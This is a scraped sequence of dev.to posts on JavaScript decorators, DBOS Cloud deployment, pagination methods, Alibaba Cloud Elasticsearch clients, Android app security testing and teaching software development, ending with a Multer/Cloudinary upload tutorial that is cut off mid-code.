That fixes the `myOddNumber` property and logger, but `myEvenNumber` still isn't working correctly; we need to do the same thing in the `evensOrOdds` decorator, too! [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_AD0cdZgqHAA1sjMABYZAA6CqPAgmIgRUPq42q4gUIgUlAJCIkhwIohq5DAEiGAu7rgxse1sAHSlwxDq5CRQmTCY7AN-AU1J5WCOvXaLAL6ai5iR7dGxsbqYNXlohZgAykLlAGrqbJ5DyMMHUOOT07OY2kdEAB-IFtdSLMxnGo9ZyeJxuOwkS4FFq3e52J4aDgQmDAEhzBwKBwkGHsY4ncwJaQIADkNU-WQyb2swGsUBpxTAcBqCm6m36FPMyyCNjWGwRApOZm2OLxMMQAFJEAAmRAAQgYTDIYCotAwxVBXkQAC5EABGMnBMzW4VIUV2dbkeF9CEyilme32J3817gwUNQJ22xe51bCluvwRmUynjiaDwJDkOBhbBgO5QJGCYAwAyeGkKapwJNhCK4Gnk22IOOSJAyOSKZS4VTPZDaXT6Izk_iV0wnT7N8hdk5QxDI67px4t31Yj5Cb7kKYzOYA9ScEFg8iLfhnIvvYuZ5DZgzaMeoicYlsLf2V09Fc-4TFsHYxKM8GMQcgKTDFACylAAwp-37BPwAACaD6nghDENMrDYmBxapumJA0hBYAALTFqWxrlr4CgQBAyDfvIiDODQdChpKvigYhaaRDScBEJhybYbhYFoTg-BEKQwDqAcV6IPhhHEbgpGUNBlFvjwPBUjuljjJYChNgsPAjvozg5J4YDIAA7ogf6AV-pALHJe7JihaGmjIvEgOQNRvDS2jqTkwxkXqYCUSpzmueRGCUXm2QLnANKqQgmC7sM-6oXQpoKMA5TMLglA2GEzBwIgDI2O0nQbmwjnMMgGk-e5nnSd5bkUT6TAAMyhVgEVRZZgnxR4LDJWAqXKBlVhdYxXQwn0-Xlb5Hn8l5hUuRVflVYgAAsdXhfJjUxc1CWfLAHVpSgdB8hKQ0TcVlUSipVLoWd50XdJpmReZDFEFZh4FnZuXIPtRVkRJY1lQdH1EP5TA0oFSYhddUV9bFLWiW1KVbZlyTqDlDlOT94l_V9PDDZ9EqeLVoO3eDq2tUlMNdQyvVELtg3I-9qMEKVGMo1jfSePNeNhChBNxWt9wk-laGU3Yb2TbTnkANxAA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
function evensOrOdds(onlyEvens = true) {
return function decorator(value, context) {
let internalNumber = 0
return {
get() {
// invoke the previous getter, but only return our valid number
value.get.call(this)
return internalNumber
},
set(val) {
const previousSetterValue = value.set.call(this, val) ?? val
const num = Number(previousSetterValue)
if(isNaN(num)) {
// don't set the value if it's not a number
return internalNumber
}
if(num % 2 !== (onlyEvens ? 0 : 1)) {
return internalNumber
}
        // store the chained value so transforms from previous setters are kept
        internalNumber = previousSetterValue
return internalNumber
}
}
}
}
```
Note how we're calling the previous getter/setter with `.call(this, val)`, which helps ensure that the `this` value is consistent. Importantly, we're also using the nullish coalescing operator `?? val` at the end to ensure that, if the previous setter/getter doesn't return anything, we keep the original `val` and use that.
### Order Matters
Now that it's all working, let's take another close look at the logs. You may note that the `even-logger` logs the value _before_ it is validated by our `evensOrOdds` decorator, while the `odd-logger` logs the value _after_ the value has been validated.
It's important to note that the order of our chained decorators is different for each property:
```js
// weird ordering on decorators
class MyClass {
@evensOrOdds(true)
@logOnSet('even-logger:')
accessor myEvenNumber
@logOnSet('odd-logger:')
@evensOrOdds(false)
accessor myOddNumber
}
```
Decorators are executed from bottom-to-top, just like normal JavaScript functions are executed right-to-left: `last(first())`. We want our logger to be logging values _after_ validation, so let's reorder the decorators on `myEvenNumber` (and finally remove all the other console logs): [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_AD0cdZgqHAA1sjMABYZAA6CqPAgmIgRUPq42q4gUIgUlAJCIkhwIohq5DAEiGAu7rgxse1sAHSlwxDq5CRQmTCY7AN-AU1J5WCOvXaLAL6ai5iR7dGxsbqYNXlohZgAykLlAGrqbJ5DyMMHUOOT07OY2kdEAB-IFtdSLMxnGo9ZyeJxuOwkS4FFq3e52J4aDgQmDAEhzBwKBwkGHsY4ncwJaQIADkNU-WQyb2swGsUBpxTAcBqCm6m36FPMyyCNjWGwRApOZm2OLxMMQAFJEAAmRAAQgYTDIYCotAwxVBXkQAC5EABGMnBMzW4VIUV2dbkeF9CEyilme32J3817gwUNQJ22xe51bCluvwRmUynjiaDwJDkOBhbBgO5QJGCYAwAyeGkKapwJNhCK4Gnk22IOOSJAyOSKZS4VTPZDaXT6Izk_iV0wnT7N8hdk5QxDI67px4t31Yj5Cb7kKYzOYA9ScEFg8iLfhnIvvYuZ5DZgzaMeoicYlsLf2V09Fc-4TFsHYxKM8GMQcgKTDFACylAAwp-37BPwAACxapumJA0mgGAALTFqWxrlr4oGwVgeCEMQ0ysNi_AKBAEDIN-8iIM4NB0KGkqoRBaaRDScBEAhyZIShYHoTg-BEKQwDqAcV6IARREkbgZGUFhVFvjwPA7pY4yWAoTYLDJCDnMwyDODknhgMgADuiB_oBX6kAssl7sm0HoaaMi8SA5A1G8NLaPomnDORepgFRykuTkbkURgVF5tkC5wDS0k-X5HmBUwADM4Uab57mUT6TAACzSVScFZdlOXSWZwz7gxRDWYeBb2RubBOeprnkRJ_LeQlfl1RKQXICFYU8BFtVENFiBxZ1jXdQQvWpUAA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
// better ordering on decorators
class MyClass {
@logOnSet('even-logger:')
@evensOrOdds(true)
accessor myEvenNumber
@logOnSet('odd-logger:')
@evensOrOdds(false)
accessor myOddNumber
}
```
Those logs look better, and we've only had to write our console log logic once, too!
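If you'd like to poke at these chaining semantics in plain Node.js, without a decorators-enabled transpiler, you can emulate the accessor-decorator protocol by hand. This is a rough sketch, not the real proposal: `applyDecorators` and its simplified context object are my own stand-ins, while the two decorators closely mirror the ones above:

```js
// Emulate chained accessor decorators with Object.defineProperty.
function applyDecorators(obj, key, decorators) {
  let backing
  let accessors = {
    get() { return backing },
    set(val) { backing = val },
  }
  // Apply bottom-to-top: the last-listed decorator wraps the native pair first.
  for (const dec of [...decorators].reverse()) {
    const prev = accessors
    accessors = { ...prev, ...dec(prev, { kind: 'accessor', name: key }) }
  }
  Object.defineProperty(obj, key, { get: accessors.get, set: accessors.set })
}

function logOnSet(prefix) {
  return (value) => ({
    set(val) {
      const previousSetterValue = value.set.call(this, val) ?? val
      console.log(prefix, previousSetterValue)
      return previousSetterValue
    },
  })
}

function evensOrOdds(onlyEvens) {
  return (value) => {
    let internalNumber = 0
    return {
      get() { value.get.call(this); return internalNumber },
      set(val) {
        const previousSetterValue = value.set.call(this, val) ?? val
        const num = Number(previousSetterValue)
        if (isNaN(num) || num % 2 !== (onlyEvens ? 0 : 1)) return internalNumber
        internalNumber = previousSetterValue // store the chained value
        return internalNumber
      },
    }
  }
}

const obj = {}
applyDecorators(obj, 'myEvenNumber', [logOnSet('even-logger:'), evensOrOdds(true)])
obj.myEvenNumber = 4 // logs "even-logger: 4"
obj.myEvenNumber = 5 // logs "even-logger: 4" (the rejected 5 never sticks)
```

Running it logs `even-logger: 4` twice: the valid write, then the rejected `5` re-logging the validated value, just like the real decorator chain.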
### Best Practices
A TLDR of the "Writing Composable Decorators" section.
- Call the previous decorator's setter/getter: `value.set.call(this, val)` to enable chaining
- Fall back to the original value if the previous decorator's setter/getter doesn't return anything: `value.set.call(this, val) ?? val`
- Return a value in your setter/getter, so that other decorators can easily chain it: `return internalNumber`
- Ensure the order is correct - decorators execute from bottom-to-top! | frehner |
1,917,957 | DBOS-Cloud Simple and Robust Workflow Orchestration | This post gives a simple example which: 1) sets up api endpoints, 2) sends emails using Postmark when an api is hit, inserts events in to Postgres, and queries for those events. | 0 | 2024-07-10T02:50:18 | https://dev.to/vince_hirefunnel_co/dbos-cloud-simple-and-robust-workflow-orchestration-cn4 | dbos, workflows, postgres, orchestration | ---
title: DBOS-Cloud Simple and Robust Workflow Orchestration
published: true
description: "This post gives a simple example which: 1) sets up api endpoints, 2) sends emails using Postmark when an api is hit, inserts events into Postgres, and queries for those events."
tags: dbos, workflows, postgres, orchestration
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u53vx60zfe2u9b36865g.png
# Use a ratio of 100:42 for best results.
published_at: current
---
This is a toy [DBOS](https://docs.dbos.dev/) app example focusing on remote deployment to [DBOS Cloud](https://www.dbos.dev/dbos-cloud), their hosted solution with a generous free tier for devs.
The [github repo](https://github.com/weisisheng/dbos-httpapi-postmark-v202407/tree/master) sets up two simple HTTP API endpoints that: 1) sends an email using Postmark ESP when you hit `/sendemail/:friend/:content` endpoint and 2) inserts a record into a postgres d'base instance and retrieves the records when you visit the `/emails` endpoint.
## Prerequisites
1. Make sure you have Node.js 21.x
2. Sign up for DBOS Cloud (https://www.dbos.dev/dbos-cloud)
3. Have a Postmark account, username / password from the server (https://postmarkapp.com/), and a specific sending email address setup
\*\*\*Since this uses nodemailer, you can easily swap out Postmark for your email service provider of choice.
## Getting Started
1. Clone this repository and navigate to the project directory
2. Install the dependencies
**_*Be sure not to commit / hard code your secrets to a public repo! This setup is meant for local development and direct deployment to the dbos-cloud service.*_**
3. To deploy to DBOS-cloud, log in with "**_npx dbos-cloud login_**" and follow the instructions: match the UUID shown in the console to the one in the browser, then the standard username/password login applies.
4. Next provision a d'base instance: "**_npx dbos-cloud db provision database-instance-name -U database-username_**"
5. Register your app with the d'base instance: "**_npx dbos-cloud app register -d database-instance-name_**"
6. To use secrets in DBOS, add your variables in the cli like this:
- export POSTMARK_USER=api-key-from-postmark-server-here
- export POSTMARK_PASSWORD=api-key-from-postmark-server-here
- export PGPASSWORD=put-the-password-you-created-when-you-setup-the-remote-database-here
- export SENDER_EMAIL=sender@foobar.com
- export RECIPIENT_EMAIL=receiver@foobar.com
These will be picked up at build time and inserted into the dbos-config.yaml fields: ${PGPASSWORD}, ${POSTMARK_USER}, ${POSTMARK_PASSWORD}, ${SENDER_EMAIL}, ${RECIPIENT_EMAIL} respectively.
7. And finally deploy your app: "**_npx dbos-cloud app deploy_**"
After a minute or two, you'll get back an api endpoint that looks like: `https://<username>-<app-name>.cloud.dbos.dev/`.
8. Test the endpoint:
First, visit `https://<username>-<app-name>.cloud.dbos.dev/sendemail/friend/content` replacing 'friend' and 'content' with your own choices. Hitting this sends an email using Postmark and inserts a record into the d'base named 'postmark'.
Then visit `https://<username>-<app-name>.cloud.dbos.dev/emails` to retrieve the records from the d'base.
9. To delete the app online,`npx dbos-cloud app delete [application-name] --dropdb`. Remove the '--dropdb' parameter if you want to retain the database table.
## Some caveats:
- **The endpoint is not secure**, and anyone can send an email if they guess the assigned endpoint. You should add some sort of authentication to the endpoint to prevent abuse.
Here are some instructions for that: https://docs.dbos.dev/tutorials/authentication-authorization
- When building workflows with DBOS, consider creating the standalone functions first, then wrapping them in an HTTP API decorator/function, and then wrapping all of that in a @workflow, which adds a bunch of useful built-in features:
  - granular observability
  - guaranteed only-once execution
  - asynchronous execution
  - precise management and observability of workflows
There are so many more benefits to mention re: debugging, monitoring and overall speed, security, and costs which can be explored further here: https://docs.dbos.dev/
---
## Reference Docs (From Official Repo)
- To add more functionality to this application, modify `src/operations.ts`, then rebuild and redeploy it.
- For a detailed tutorial, check out our [programming quickstart](https://docs.dbos.dev/getting-started/quickstart-programming).
- To learn how to deploy your application to DBOS Cloud, visit our [cloud quickstart](https://docs.dbos.dev/getting-started/quickstart-cloud/)
- To learn more about DBOS, take a look at [our documentation](https://docs.dbos.dev/) or our [source code](https://github.com/dbos-inc/dbos-transact).
| vince_hirefunnel_co |
1,917,961 | Comparing Limit-Offset and Cursor Pagination | Comparing Limit-Offset and Cursor Pagination There are two popular methods for pagination... | 0 | 2024-07-10T01:56:38 | https://dev.to/jacktt/comparing-limit-offset-and-cursor-pagination-1n81 | database, backend | ## Comparing Limit-Offset and Cursor Pagination
There are two popular pagination methods: `limit-offset pagination` and `cursor pagination`. Each has its own strengths and weaknesses, making them suitable for different scenarios. Let's explore these methods, comparing their performance, complexity, and use cases.
## Limit-Offset Pagination
**How It Works:**
Limit-offset pagination is straightforward and involves two main parameters:
1. **Limit**: The number of records to fetch.
2. **Offset**: The number of records to skip before starting to fetch the records.
On the user interface side, users typically see pages instead of limit-offset pairs. However, behind the scenes, these pages are converted to limit-offset using the following simple formula:
- limit = page size
- offset = (page number - 1) x page size
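Expressed as code (a hypothetical helper; the names are illustrative):

```js
// Convert a 1-based page number and page size into a limit/offset pair.
function pageToLimitOffset(page, pageSize) {
  return { limit: pageSize, offset: (page - 1) * pageSize };
}

const { limit, offset } = pageToLimitOffset(3, 10);
// limit = 10, offset = 20 -> page 3 with a page size of 10
```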
For example, in SQL, a query using limit-offset pagination might look like this:
```sql
SELECT * FROM articles ORDER BY id DESC LIMIT 10 OFFSET 20;
```
This query fetches 10 articles, skipping the first 20 (corresponds to page 3 with a page size of 10).
**Pros:**
1. **Simplicity**: Easy to understand and implement.
2. **Flexibility**: Allows direct access to any page of the results.
**Cons:**
1. **Performance**: Can become slow with large offsets since the database has to scan and discard the rows before the offset.
2. **Inconsistency**: Results can become inconsistent if the underlying data changes between queries. This is problematic in dynamic datasets where records are frequently added or removed.
## Cursor Pagination
**How It Works:**
Cursor pagination, also known as keyset pagination, uses a unique identifier (cursor) to mark the position in the dataset. Instead of using offset, it fetches records after the last retrieved record based on the cursor.
For example, a query might look like this:
```sql
SELECT * FROM articles WHERE id > 100 ORDER BY id ASC LIMIT 10;
```
Here, `100` is the cursor representing the last seen `id`.
**Pros:**
1. **Performance**: More efficient for large datasets since it avoids scanning and discarding rows.
2. **Consistency**: More consistent results in dynamic datasets as it is less affected by changes in the data.
**Cons:**
1. **Complexity**: Slightly more complex to implement, especially in maintaining the cursor state.
2. **Flexibility**: Less flexible in accessing arbitrary pages directly, as you must traverse sequentially from the start.
I recommend **against** exposing the ID directly for use as a cursor. The auto-incremented ID is sensitive information: it not only reveals the sequence of records but also exposes the total number of records through the last ID.
You can encrypt it before exposing, and then decrypt it upon receipt to prevent exposure of the raw value.
## Performance Comparison
**Limit-Offset Pagination:**
- Performance can degrade with high offset values due to the need to scan and discard many rows.
- Simple queries but can cause heavy load on the database in scenarios with deep pagination.
**Cursor Pagination:**
- Maintains high performance even with large datasets since it works by directly accessing the position marked by the cursor.
- Better suited for applications with continuous scrolling or infinite scroll patterns where users do not need to jump to arbitrary pages.
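A tiny self-contained simulation makes the consistency difference concrete. Assume a newest-first feed paginated three items per page, with a new record arriving between the two page requests:

```js
let articles = [9, 8, 7, 6, 5, 4, 3, 2, 1]; // ids, newest first

const pageByOffset = (data, page, size = 3) =>
  data.slice((page - 1) * size, (page - 1) * size + size);

const page1 = pageByOffset(articles, 1); // [9, 8, 7]

// A new article (id 10) is published before the user requests page 2.
articles = [10, ...articles];

const page2 = pageByOffset(articles, 2); // [7, 6, 5] -> id 7 is shown twice

// Cursor pagination is unaffected: fetch items *after* the last seen id.
const pageByCursor = (data, lastSeenId, size = 3) => {
  const start = data.indexOf(lastSeenId) + 1;
  return data.slice(start, start + size);
};

const cursorPage2 = pageByCursor(articles, 7); // [6, 5, 4] -> no duplicates
```

With offset pagination, id `7` appears on both pages after the insert; the cursor-based fetch picks up exactly where the reader left off.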
## Use Cases
**Limit-Offset Pagination:**
- Ideal for scenarios with relatively small datasets or where the need to jump to specific pages outweighs performance concerns.
- Suitable for static data where the likelihood of data changes between requests is low, such as paginated static reports.
**Cursor Pagination:**
- Best for applications dealing with large datasets or requiring high-performance pagination, such as social media feeds, activity streams, or scanning data for ETL tasks.
- Useful in dynamic environments where data changes frequently, ensuring more consistent user experiences.
## Conclusion
Choosing between limit-offset and cursor pagination depends on the specific needs and constraints of your application.
- Limit-offset pagination offers simplicity and flexibility but can suffer from performance issues with large datasets.
- Cursor pagination provides better performance and consistency, making it ideal for large or dynamic datasets, though it requires a bit more implementation effort. | jacktt |
1,917,962 | Unlocking the Power of Alibaba Cloud Elasticsearch: A Step-by-Step Guide to Accessing Your Cluster | Introduction Incorporating new technologies into museum displays or any data-intensive... | 0 | 2024-07-10T01:57:52 | https://dev.to/a_lucas/unlocking-the-power-of-alibaba-cloud-elasticsearch-a-step-by-step-guide-to-accessing-your-cluster-3jg1 | tutorial, programming, learning, ai | ## Introduction
Incorporating new technologies into museum displays or any data-intensive environment can significantly enhance user experiences and operational efficiency. Alibaba Cloud Elasticsearch offers robust solutions tailored for these needs. This guide will walk you through using PHP, Python, Java, and Go clients to access an [Alibaba Cloud Elasticsearch](https://www.alibabacloud.com/en/product/elasticsearch) cluster.
<a name="FgH46"></a>
## Preparations
<a name="sMxFB"></a>
### Step 1: Create an Alibaba Cloud Elasticsearch Cluster
Before accessing your Elasticsearch cluster, you need to create one. For detailed instructions, refer to the [Create an Alibaba Cloud Elasticsearch cluster](https://www.alibabacloud.com/en/product/elasticsearch) guide.
<a name="QgVyY"></a>
### Step 2: Install the Required Elasticsearch Client
Install the Elasticsearch client for your preferred programming language. Ensure you use a version compatible with your Elasticsearch cluster. For more details, see [Version Compatibility](https://www.alibabacloud.com/en/product/elasticsearch).
<a name="STuzb"></a>
## Client-Specific Instructions and Samples
<a name="AHP8P"></a>
### Go Client
1. **Prerequisites:** Install Go 1.19.1 and set up your Go environment. [The Go Programming Language](https://golang.org/).
2. **Sample Code:**
```go
// In this example, a Go 1.19.1 client is used.
package main
import (
"log"
"github.com/elastic/go-elasticsearch/v7"
)
func main() {
cfg := elasticsearch.Config {
Addresses: []string{
"<YourEsHost>",
},
Username: "<UserName>",
Password: "<YourPassword>",
}
es, err := elasticsearch.NewClient(cfg)
if err != nil {
log.Fatalf("Error creating the client: %s", err)
}
res, err := es.Info()
if err != nil {
log.Fatalf("Error getting response: %s", err)
}
defer res.Body.Close()
log.Println(res)
}
```
<a name="yMRSF"></a>
### Java Client
1. **Prerequisites:** Use High Level REST Client 6.7 or compatible version.
2. **Sample Code:**
```java
import org.apache.http.HttpHost;
import org.apache.http.auth.AuthScope;
import org.apache.http.auth.UsernamePasswordCredentials;
import org.apache.http.client.CredentialsProvider;
import org.apache.http.impl.client.BasicCredentialsProvider;
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestClient;
import org.elasticsearch.client.RestHighLevelClient;
public class ElasticSearchJavaClient {
    public static void main(String[] args) throws Exception {
        // Basic auth credentials for the cluster
        final CredentialsProvider credentialsProvider = new BasicCredentialsProvider();
        credentialsProvider.setCredentials(AuthScope.ANY,
                new UsernamePasswordCredentials("<UserName>", "<YourPassword>"));
        RestHighLevelClient client = new RestHighLevelClient(
                RestClient.builder(new HttpHost("<YourEsHost>", 9200, "http"))
                        .setHttpClientConfigCallback(httpClientBuilder ->
                                httpClientBuilder.setDefaultCredentialsProvider(credentialsProvider)));
        System.out.println(client.info(RequestOptions.DEFAULT));
        client.close();
    }
}
```
<a name="u5owA"></a>
### PHP Client
1. **Note:** Use `SimpleConnectionPool` for better compatibility.
2. **Sample Code:**
```php
require 'vendor/autoload.php';
$hosts = [
[
'host' => '<YourEsHost>',
'port' => '9200',
'scheme' => 'http',
'user' => '<UserName>',
'pass' => '<YourPassword>',
]
];
$client = \Elasticsearch\ClientBuilder::create()
->setHosts($hosts)
->setConnectionPool('\Elasticsearch\ConnectionPool\SimpleConnectionPool', [])
->build();
$response = $client->info();
print_r($response);
```
<a name="rEKN1"></a>
### Python Client
1. **Sample Code:**
```python
from elasticsearch import Elasticsearch
es = Elasticsearch(
['<YourEsHost>'],
http_auth=('<UserName>', '<YourPassword>'),
scheme="https",
port=9200,
verify_certs=True
)
print(es.info())
```
<a name="sXQri"></a>
## Additional Configuration Steps
<a name="Z3xZH"></a>
### Enable Auto Indexing
Enable the Auto Indexing feature for the Elasticsearch cluster. For more information, refer to [Configure the YML file](https://www.alibabacloud.com/en/product/elasticsearch).
<a name="uyDNR"></a>
### Configure IP Whitelists
1. **Internal Access:** If your server is within the same VPC, use the internal endpoint and add the server's private IP to the private IP address whitelist.
2. **Public Access:** For servers on the Internet, enable Public Network Access and add the server's public IP to the public IP address whitelist.
<a name="GkNAV"></a>
## Conclusion
By implementing the steps and using the provided code snippets, you can effectively access and manage your [Alibaba Cloud Elasticsearch](https://www.alibabacloud.com/en/product/elasticsearch) cluster. Remember to keep your systems updated and secure to ensure optimal performance.
Start your journey with Elasticsearch on Alibaba Cloud with our tailored solutions and services.<br /> [Click here to embark on Your 30-Day Free Trial](https://c.tb.cn/F3.bTfFpS) | a_lucas |
1,917,963 | How to Do Android App Security Testing: A Guide for Developers and Testers | Introduction As a die-hard fan of Android phones, if your phone suddenly drops, would your... | 0 | 2024-07-10T01:57:57 | https://dev.to/wetest/how-to-do-android-app-security-testing-a-guide-for-developers-and-testers-3j8b | javascript, programming, devops, beginners | ## Introduction
As a die-hard Android fan, if your phone suddenly went missing, would your first thought be "Oh my god!" or would it be that your money in Google Pay or PayPal is not safe? If your latest downloaded app not only pops up annoying ads but also sends unexpected notifications, would you suspect a phishing attempt and immediately uninstall it?
How can we ensure that our app provides a safe experience for users who have insufficient awareness of Android security vulnerabilities? What are the security vulnerabilities in the Android ecosystem? Where can we explore new Android security testing techniques? How can we streamline the security testing process?
## Common Android Security Vulnerabilities
Firstly, the open-source development advantage of the Android operating system also conceals inherent security issues in its development, such as the Android system's sandbox system (i.e., virtual machine). However, the underlying layer has one vulnerability after another, allowing malicious programs (or tools) to gain root access and break the sandbox's restrictions. Just like in the PC era, there is no absolutely secure PC operating system; in the mobile internet era, there is no absolutely secure mobile operating system either. The security risks of the Android open-source ecosystem are like blood-stained alarm bells, striking the hearts of every Android developer.
Secondly, the security risks in the Android APP/SDK development process are like unknown black holes. We never know where the endpoint of security confrontation is, who the attackers are, who the terminators are, and how to defend against them.
Finally, at the user level, what are some common and recognizable security behavior vulnerabilities?
Both Android Apps and SDKs have security vulnerabilities to some extent. Perhaps one day, your application might be affected by one of the above security vulnerabilities. Coincidentally, while testing an Android SDK recently, we discovered a security vulnerability related to Android application components. Based on this example, the methods, techniques, and processes for Android SDK security testing are summarised.
## Android APPs' Security Testing Examples
**Overview of Vulnerability Causes**
An optional component of an application's Android SDK (the application is referred to simply as "the application" below) opens a random local port to monitor whether the Java-layer service is alive. However, when the Java layer communicates with this component, it does not strictly check the input parameters, so they can be filled with attack code and maliciously exploited when the component calls the Linux `system()` function.
The following screenshot shows that after the simulation port is attacked, the application component intent modifies the URL content during communication, and the Webview displays garbled code:

## Potential Security Risks of the Vulnerability
The four major application components of Android APPs: Activity, Receiver, Service, and Content Provider, as well as the security roles of application components communicating through intent for IPC, will not be discussed in detail here. Leveraging the component-related vulnerability in the above example, the following diagram shows the attack dimensions related to the terminal APP side:

Because an Android app runs in a local application environment, its network sockets inherently lack a fine-grained authentication and authorization mechanism. Therefore, if the Android client acts as a server, an attacker can reverse-engineer the app to find its local random port number and actively send attacks to that port, exposing the following security hazards:
1. **Local command execution**: When the package name in the embedded intent is set to the application itself and the component name is set to one of its activities, any activity of the application can be started, including protected, non-exported activities, causing a security hazard. For example, a denial-of-service vulnerability can be found by starting unexported activities one by one through HTTP requests.
2. **Command control to modify application permissions**: Pass an intent that starts Android application components through the open socket port, then execute operations such as starting activities and sending broadcasts with the permissions of the attacked application. Because intents passed in through the socket cannot be checked against the sender's identity and permissions, this bypasses the permission protection Android provides for application components and can start unexported, permission-protected components, posing a security hazard.
3. **Sensitive information disclosure, mobile phone control**: A local service opens a UDP port to listen and, after receiving a specific command word, returns sensitive information about the phone. For example, the Baidu mobile phone butler exposed the secretKey it uses for remote phone management, and unauthorized attackers could then fully manage the phone through the network.
## Android Security Testing Execution
**Android Security Hardening Version Optimization**
1. Add checks for system commands and special character filtering in both the Native and Java layers.
2. Encrypt socket communication for JNI Watchdog daemon process.
3. Add feature verification for URLs, intents, and activities in local notification functions to prevent redirection to malicious links when clicking on notifications.
4. Change the storage location of Package name in the app's local storage.
5. Add online configuration functionality.
These are the important requirements for this security hardening optimization.
## Special Security Testing
If you follow conventional system testing or performance testing, you only need to perform forward testing based on the changing requirements. However, for security testing, ensuring the robustness of the SDK's security requires reverse special testing, simulating various security attack methods, and diverging test cases for the modified points.
## Android Regular Security Regression Testing
1. **Privacy data**: External storage security and internal storage security; check if user names, passwords, chat records, configuration information, and other private information are saved locally and encrypted; verify the integrity of the information before using it.
2. **Permission attacks**: Check the app's directory and ensure that its permissions do not allow other group members to read or write; check if system permissions are under attack.
3. **Android component permission protection**: Prevent app internal components from being arbitrarily called by third-party programs: prevent Activities from being called by third-party programs, prevent Activity hijacking; ensure Broadcast reception and transmission security, only receive broadcasts sent out by the app, and prevent third parties from receiving transmitted content; prevent maliciously starting or stopping services; check Content Provider operation permissions; if components need to be called externally, verify if signature restrictions have been applied to the caller.
4. **Upgrades**: Check the integrity and legality of the upgrade package to avoid hijacking.
5. **3rd-party libraries**: If third-party libraries are used, follow up on their updates and check their security.
6. **ROM security**: Use official ROMs or ROMs provided by authoritative teams to avoid the addition of implanted ads, Trojans, etc.
7. **Anti-cracking countermeasures**: Counteract decompilation, making it impossible to decompile using decompilation tools or obtain the correct disassembly code after decompilation; counteract static analysis by using code obfuscation and encryption; counteract dynamic debugging by adding code to detect debuggers and emulators; prevent recompilation by checking signatures and verifying the hash value of the compiled dex file.
After completing the security special testing and regular process testing, perform rolling regression testing for the app's existing features, compatibility between new and old versions, and compatibility with different Android operating system versions.
## Wrap-up
Compared to ordinary performance and system functionality test cases, security test cases require a more comprehensive understanding of the Android ecosystem, such as: covering user security appearance level, application system local and remote attack level, and operating system vulnerability level, with more focus on designing reverse attack thinking test cases.
If the starting point of development is security defense, the starting point of testing is the hacker attack mindset. Designing test cases for attack scenarios and implementing attack testing techniques determines the robustness of the SDK's security.
To ensure the highest level of security for your applications, consider utilizing WeTest Application Security Testing. This service provides a comprehensive evaluation of security issues in applications, timely detection of program vulnerabilities, and offers code repair examples to assist with vulnerability repairs.
Trust [WeTest](https://www.wetest.net/?utm_source=forum&utm_medium=dev) to safeguard your application against potential threats and maintain a secure user experience.
 | wetest |
1,917,964 | Good ways to teach software development? | Hello! Just a few weeks ago I started to organize myself to teach others about software development,... | 0 | 2024-07-10T02:00:49 | https://dev.to/tonyrome/good-ways-to-teach-software-development-55d0 | discuss, learning, teaching, education | Hello!
Just a few weeks ago I started organizing myself to teach others about software development: the basics, computational thinking, backend, frontend, some professional tips, and other topics from scratch. For now I only have a general idea and a roadmap of what and how to teach. Nowadays there are a lot of tools for creating good classes, both online and face to face, but I lack the experience to use them well; so far I have taught with a whiteboard and a personal computer, showing lines and lines of code with some simple examples. In your opinion, what tools are great for making a class fun and capturing students' attention? I would like to avoid boring them by showing only lines of code, and to avoid falling into the typical examples everyone sees when starting to code.
I know some AI tools but I don't have enough experience to make a great class, so could you please share some tips or tools for teaching while still making it a great experience?
I appreciate any tips, thanks! | tonyrome |
1,917,965 | Simplify File Uploads with @fluidjs/multer-cloudinary in Express.js | Simplify File Uploads with @fluidjs/multer-cloudinary in Express.js ... | 0 | 2024-07-10T02:02:02 | https://dev.to/imani_brown_1a7d9bc29dd27/simplify-file-uploads-with-fluidjsmulter-cloudinary-in-expressjs-1i1m | javascript, multer, fileupload | # Simplify File Uploads with @fluidjs/multer-cloudinary in Express.js
## Introduction
Handling file uploads can be a daunting task, but with `@fluidjs/multer-cloudinary`, the process becomes straightforward and manageable. In this article, we'll walk through setting up an Express.js application to upload files directly to Cloudinary with minimal configuration.
## Why Use @fluidjs/multer-cloudinary?
This package offers several benefits that make it an excellent choice for managing file uploads:
- **Simplified Integration**: Easy to set up and integrate with existing projects.
- **Streamlined Workflow**: Reduces the complexity of managing file uploads.
- **Customizable Options**: Allows customization to fit specific needs.
- **Type Safety**: Supports TypeScript for better code maintainability.
## Step 1: Setting Up Your Environment
First, let's install the necessary packages. Open your terminal and run the following command:
```bash
npm install @fluidjs/multer-cloudinary cloudinary express dotenv
```
Next, create a .env file in your project's root directory to store your Cloudinary credentials. Add the following lines to your .env file:
```env
CLOUDINARY_CLOUD_NAME=your_cloud_name
CLOUDINARY_API_KEY=your_api_key
CLOUDINARY_API_SECRET=your_api_secret
```
## Step 2: Configuring Express and Cloudinary
Now, let's set up our Express server and configure Cloudinary. Create an index.js file and add the following code:
```js
const express = require('express');
const multer = require('multer');
const { CloudinaryStorage } = require('@fluidjs/multer-cloudinary');
const { v2: cloudinary } = require('cloudinary');
const dotenv = require('dotenv');
dotenv.config();
const app = express();
const port = process.env.PORT || 8080;
// Configure Cloudinary
cloudinary.config({
